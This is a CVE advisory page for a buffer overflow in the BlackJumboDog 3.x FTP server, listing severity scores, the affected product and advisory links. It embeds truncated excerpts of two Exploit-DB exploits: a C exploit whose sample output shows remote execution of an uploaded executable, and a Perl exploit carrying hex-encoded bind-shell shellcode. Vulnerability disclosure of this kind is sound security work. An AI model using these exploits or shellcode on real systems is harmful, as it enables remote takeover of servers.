CVE-2004-1439
published 2004-12-31CVE-2004-1439: Buffer overflow in BlackJumboDog 3.x allows remote attackers to execute arbitrary code via long FTP commands such as (1) USER, (2) PASS, (3) RETR,(4) CWD, (5)…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
15.85%
96.5th percentile
Buffer overflow in BlackJumboDog 3.x allows remote attackers to execute arbitrary code via long FTP commands such as (1) USER, (2) PASS, (3) RETR,(4) CWD, (5) XMKD, and (6) XRMD.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sapporoworks | black_jumbodog | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow
exploitdb·2004-09-12
CVE-2004-1439 BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow
BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow
---
/*
6.9.04|www.Delikon.de|Delikon
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
http://www.securiteam.com/windowsntfocus/5AP040ADPW.html
Thx to Chew Keong TAN
C:\Codes\blackjumbodog\Release>bjdexploit 192.168.0.3 21 klein.exe
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
http://www.securiteam.com/windowsntfocus/5AP040ADPW.html
Thx to Chew Keong TAN
Delikon|6.9.04|www.Delikon.de
[+] Connected.
220 FTP ( BlackJumboDog Version 3.6.1 ) ready
[+]Shellcode length: 461
[+] Sending the shellcode
[+] Sleeping
[+] Opening File
[+] File found ready to send
[+] Connected
[+] Sending executable.
....
[+] All done, server have now executed your executable!
[+] Have a nice day
*/
#include
#include
#include
//opens a p
Exploit-DB
BlackJumboDog FTP Server - Remote Buffer Overflow
exploitdb·2004-08-05
CVE-2004-1439 BlackJumboDog FTP Server - Remote Buffer Overflow
BlackJumboDog FTP Server - Remote Buffer Overflow
---
#!/usr/bin/perl
#
# blackJumboDog Exploit code by Tal zeltzer
#
use strict;
use IO::Socket::INET;
usage() unless(@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
my $shellcode =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85".
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19".
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05".
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0".
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74".
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15".
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7
No writeups or analysis indexed.
http://secunia.com/advisories/12203http://www.ir3ip.net/pipermail/bugtraq/2004-September/009960.htmlhttp://www.kb.cert.org/vuls/id/714584http://www.security.org.sg/vuln/bjd361.htmlhttp://www.securityfocus.com/bid/10834https://exchange.xforce.ibmcloud.com/vulnerabilities/16842http://secunia.com/advisories/12203http://www.ir3ip.net/pipermail/bugtraq/2004-September/009960.htmlhttp://www.kb.cert.org/vuls/id/714584http://www.security.org.sg/vuln/bjd361.htmlhttp://www.securityfocus.com/bid/10834https://exchange.xforce.ibmcloud.com/vulnerabilities/16842
2004-12-31
Published